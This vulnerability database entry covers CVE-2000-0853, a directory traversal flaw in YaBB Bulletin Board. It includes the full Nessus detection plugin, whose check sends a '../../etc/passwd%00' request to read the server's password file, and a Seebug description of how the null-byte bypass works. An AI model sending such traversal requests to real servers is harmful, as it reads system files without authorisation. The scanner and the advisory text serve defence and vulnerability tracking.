Vulnerabilities > CVE-2000-0853 - Unspecified vulnerability in Yabb 20000901

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
yabb
nessus
exploit available

Summary

YaBB Bulletin Board 9.1.2000 allows remote attackers to read arbitrary files via a .. (dot dot) attack.

Vulnerable Configurations

Part Description Count
Application
Yabb
1

Exploit-Db

description: YaBB 9.1.2000 Arbitrary File Read Vulnerability. CVE-2000-0853. Remote exploit for cgi platform
id: EDB-ID:20218
last seen: 2016-02-02
modified: 2000-09-10
published: 2000-09-10
reporter: pestilence
source: https://www.exploit-db.com/download/20218/
title: YaBB 9.1.2000 - Arbitrary File Read Vulnerability

Nessus

NASL family: CGI abuses
NASL id: YABB.NASL
description: The (truncated here; the full text is the "description" attribute in the plugin code below)
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10512
published: 2000-09-12
reporter: This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/10512
title: YaBB YaBB.pl num Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

# Registration branch: taken only when `description` is true. It declares the
# plugin's metadata and exits before any of the checking code further down runs.
if (description)
{
  # Plugin identity and external references.
  script_id(10512);
  script_version("1.33");
  script_cve_id("CVE-2000-0853");
  script_bugtraq_id(1668);

  script_name(english:"YaBB YaBB.pl num Parameter Traversal Arbitrary File Access");

  # Report text. The multi-line string values are kept verbatim, so their
  # continuation lines start at column 0.
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that suffers from an
information disclosure vulnerability.");
  script_set_attribute(attribute:"description", value:
"The 'YaBB.pl' CGI script is installed on the remote host.  This script
has a well-known security flaw that lets an attacker read arbitrary
files with the privileges of the http daemon (usually root or nobody).");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Sep/213");
  script_set_attribute(attribute:"solution", value:
"Remove 'YaBB.pl' or upgrade to the latest version.");

  # Severity: CVSS v2 base vector (network, low complexity, no authentication,
  # partial confidentiality impact) and the temporal vector.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  # NOTE(review): this says "false" while the temporal vector above uses E:POC;
  # confirm which is intended, since triage tooling may key on this attribute.
  script_set_attribute(attribute:"exploit_available", value:"false");

  # Dates and plugin type; script_end_attributes() closes the attribute list.
  script_set_attribute(attribute:"plugin_publication_date", value:"2000/09/12");
  script_set_attribute(attribute:"vuln_publication_date", value:"2000/09/09");
  script_cvs_date("Date: 2018/11/15 20:50:19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # Scheduling information: category, family, prerequisites and opt-out key.
  script_summary(english:"Checks for the presence of YaBB.pl");
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");
  # web_traversal.nasl is listed here; the check below reads a
  # generic_traversal KB key that it presumably sets (confirm).
  script_dependencie("http_version.nasl", "web_traversal.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

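# Detection logic: request the known traversal URL against each candidate
# YaBB location and report if /etc/passwd content comes back.

# Select the HTTP port to test, defaulting to 80.
# NOTE(review): embedded: 0 presumably excludes embedded web servers; confirm
# against http.inc.
port = get_http_port(default:80, embedded: 0);

# If the server as a whole is already flagged for generic directory traversal
# (KB key presumably written by the web_traversal.nasl dependency), a passwd
# read could not be attributed to YaBB.pl. Stop here instead of raising a
# finding that names the wrong component.
if (get_kb_item("www/"+port+"/generic_traversal"))
  exit(0, 'The web server on port '+port+' is vulnerable to web directory traversal.');

# Candidate install locations: the CGI directories, plus two common forum
# paths when thorough tests are enabled.
if (thorough_tests) dirs = list_uniq(make_list("/yabb", "/forum", cgi_dirs()));
else dirs = make_list(cgi_dirs());

# Iterate the list built above. The loop previously walked cgi_dirs() again,
# so "/yabb" and "/forum" were never requested even with thorough tests on,
# and an install under those paths was silently reported as not vulnerable.
foreach dir (dirs)
{
 u = string(dir, "/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00");
 # exit_on_fail: 1 ends the plugin on a failed request rather than
 # continuing with an empty response.
 r = http_send_recv3(method: "GET", item: u, port:port, exit_on_fail: 1);
 # r[2] is matched for a root entry with uid 0 and gid 0 or 1, taken as
 # evidence that passwd content was returned.
 if(egrep(pattern:".*root:.*:0:[01]:.*", string:r[2]))
 {
   if (report_verbosity > 0)
   {
     # Include the exact URL so the operator can confirm the finding and
     # locate the script that needs to be removed or upgraded.
     txt = '\nThis URL returns the content of /etc/passwd :\n' +
     	 build_url(port: port, qs: u) + '\n';
     security_warning(port:port, extra: txt);
   }
   else
     security_warning(port);
   exit(0);
 }
}

# No candidate location returned passwd content.
exit(0, 'The web server on port '+port+' is not vulnerable.');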

Seebug

bulletinFamily: exploit
description: Bug CVE: CVE-2000-0853 BUGTRAQ: 1668 YaBB.pl是一个基于Web的公告牌脚本程序。YaBB.pl它将公告牌中的文章存放在编号的文本文件中。编号的文件名是在调用YaBB.pl时通过变量num=<file>来指定的。在检索该文件之前,YaBB在<file>后面添加一个后缀.txt。 由于YaBB中的输入合法性检查错误,在<file>中可以指定相对路径。这包括../类型的路径。此外,<file>可以不是数字格式,而且.txt后缀可以通过在<file>后面添加%00来避免。通过在单个请求中使用上述的这些漏洞,恶意用户可以察看Web服务器可以存取的任何文件。 9.1.2000 YaBB ---- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: YaBB Upgrade YaBB 9.11.2000 http://www.yabb.org/download/yabb.zip
id: SSV:4308
last seen: 2017-11-19
modified: 2008-10-25
published: 2008-10-25
reporter: Root
source: https://www.seebug.org/vuldb/ssvid-4308
title: YABB远程文件泄露漏洞